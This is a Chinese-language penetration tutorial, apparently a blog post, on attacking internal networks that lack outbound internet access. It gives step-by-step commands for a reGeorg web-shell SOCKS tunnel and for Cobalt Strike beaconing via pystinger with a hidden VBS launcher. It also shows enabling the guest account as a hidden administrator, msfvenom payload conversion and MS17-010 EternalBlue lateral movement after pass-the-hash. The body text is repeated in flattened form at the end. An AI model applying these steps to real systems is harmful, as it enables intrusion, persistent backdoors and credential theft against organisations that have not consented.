内网渗透:不出网渗透技巧
字数 1053 2025-08-15 21:31:48

内网渗透:不出网渗透技巧详解

前言

在内网渗透中,经常会遇到目标内网不通外网的情况,本文将详细介绍几种不出网环境下的内网渗透技巧。

1. Socks隧道搭建

工具准备

  • reGeorg
  • Proxifier

操作步骤

  1. 上传对应语言的脚本到目标服务器的网站目录下
  2. 通过浏览器访问上传的脚本文件,确认返回正常表示成功
  3. 本地运行reGeorgSocksProxy.py:
    python reGeorgSocksProxy.py -p 8888 -u http://x.x.x.x/tunnel.php
    
  4. 成功后将本机带入内网环境

2. Cobalt Strike (CS)上线技巧

使用pystinger工具

下载地址:https://github.com/FunnyWolf/pystinger

操作步骤

  1. 上传对应语言的脚本到网站目录下
  2. 将stinger_server.exe上传到目标服务器
  3. 创建stinger_server.vbs文件:
    Set ws = CreateObject("Wscript.Shell")
    ws.run "cmd /c D:\XXXXX\stinger_server.exe 0.0.0.0",vbhide
    
  4. 在公网VPS上运行stinger_client:
    chmod 777 stinger_client
    ./stinger_client -w http://x.x.x.x/proxy.jsp -l 0.0.0.0 -p 60000
    
  5. 抓取上线主机密码,对内网其它主机进行PTH攻击

注意事项

  • CS会话可能假死,需结束stinger_server.exe进程后重新启动

在目标内网搭建CS服务端

前提:已获取管理员权限

操作步骤

  1. 激活guest用户:
    net user guest /active:yes
    net user guest 1q2w3e4r@
    net localgroup administrators guest /add
    
  2. 上传CS4.0到目标服务器
  3. 运行服务端:
    teamserver.bat x.x.x.x 1q2w3e4r
    
  4. 运行客户端cs.bat

缺点

  • 被发现概率高
  • 需要安装Java环境
  • 基于web的socks隧道速度慢

3. MS17-010横向利用

方程式漏洞利用工具

操作步骤

  1. 生成对应监听器的bin文件
  2. 使用msfvenom转换文件:
    msfvenom -p generic/custom PAYLOADFILE=./payload.bin -a x64 --platform windows -f dll -o x64.dll
    
  3. 替换原x64.dll文件,上传工具到目标主机
  4. 设置targetip为存在漏洞的主机IP,选择系统类型,执行攻击
  5. 选择doublepulsar模块,配置IP和位数,加载生成的x64.dll

CS永恒之蓝利用插件

下载地址:https://github.com/phink-team/Cobaltstrike-MS17-010

操作步骤

  1. 安装插件,导入aggressor.cna文件
  2. 使用pystinger多主机模式使内网主机上线
  3. 生成内网监听器test
  4. 右键使用ms17-010攻击插件:
    • 配置目标IP
    • 选择test监听器
    • 攻击次数设为1(降低蓝屏风险)

总结

本文介绍了不出网环境下的内网渗透技巧,包括:

  1. Socks隧道搭建
  2. CS上线方法(pystinger和内网搭建服务端)
  3. MS17-010横向利用(方程式工具和CS插件)

注意事项

  • MS17-010利用可能导致目标蓝屏,需谨慎使用
  • 内网搭建CS服务端被发现风险较高
  • 隧道速度可能影响操作体验
内网渗透:不出网渗透技巧详解 前言 在内网渗透中,经常会遇到目标内网不通外网的情况,本文将详细介绍几种不出网环境下的内网渗透技巧。 1. Socks隧道搭建 工具准备 reGeorg Proxifier 操作步骤 上传对应语言的脚本到目标服务器的网站目录下 通过浏览器访问上传的脚本文件,确认返回正常表示成功 本地运行reGeorgSocksProxy.py: 成功后将本机带入内网环境 2. Cobalt Strike (CS)上线技巧 使用pystinger工具 下载地址 :https://github.com/FunnyWolf/pystinger 操作步骤 上传对应语言的脚本到网站目录下 将stinger_ server.exe上传到目标服务器 创建stinger_ server.vbs文件: 在公网VPS上运行stinger_ client: 抓取上线主机密码,对内网其它主机进行PTH攻击 注意事项 : CS会话可能假死,需结束stinger_ server.exe进程后重新启动 在目标内网搭建CS服务端 前提 :已获取管理员权限 操作步骤 激活guest用户: 上传CS4.0到目标服务器 运行服务端: 运行客户端cs.bat 缺点 : 被发现概率高 需要安装Java环境 基于web的socks隧道速度慢 3. MS17-010横向利用 方程式漏洞利用工具 操作步骤 生成对应监听器的bin文件 使用msfvenom转换文件: 替换原x64.dll文件,上传工具到目标主机 设置targetip为存在漏洞的主机IP,选择系统类型,执行攻击 选择doublepulsar模块,配置IP和位数,加载生成的x64.dll CS永恒之蓝利用插件 下载地址 :https://github.com/phink-team/Cobaltstrike-MS17-010 操作步骤 安装插件,导入aggressor.cna文件 使用pystinger多主机模式使内网主机上线 生成内网监听器test 右键使用ms17-010攻击插件: 配置目标IP 选择test监听器 攻击次数设为1(降低蓝屏风险) 总结 本文介绍了不出网环境下的内网渗透技巧,包括: Socks隧道搭建 CS上线方法(pystinger和内网搭建服务端) MS17-010横向利用(方程式工具和CS插件) 注意事项 : MS17-010利用可能导致目标蓝屏,需谨慎使用 内网搭建CS服务端被发现风险较高 隧道速度可能影响操作体验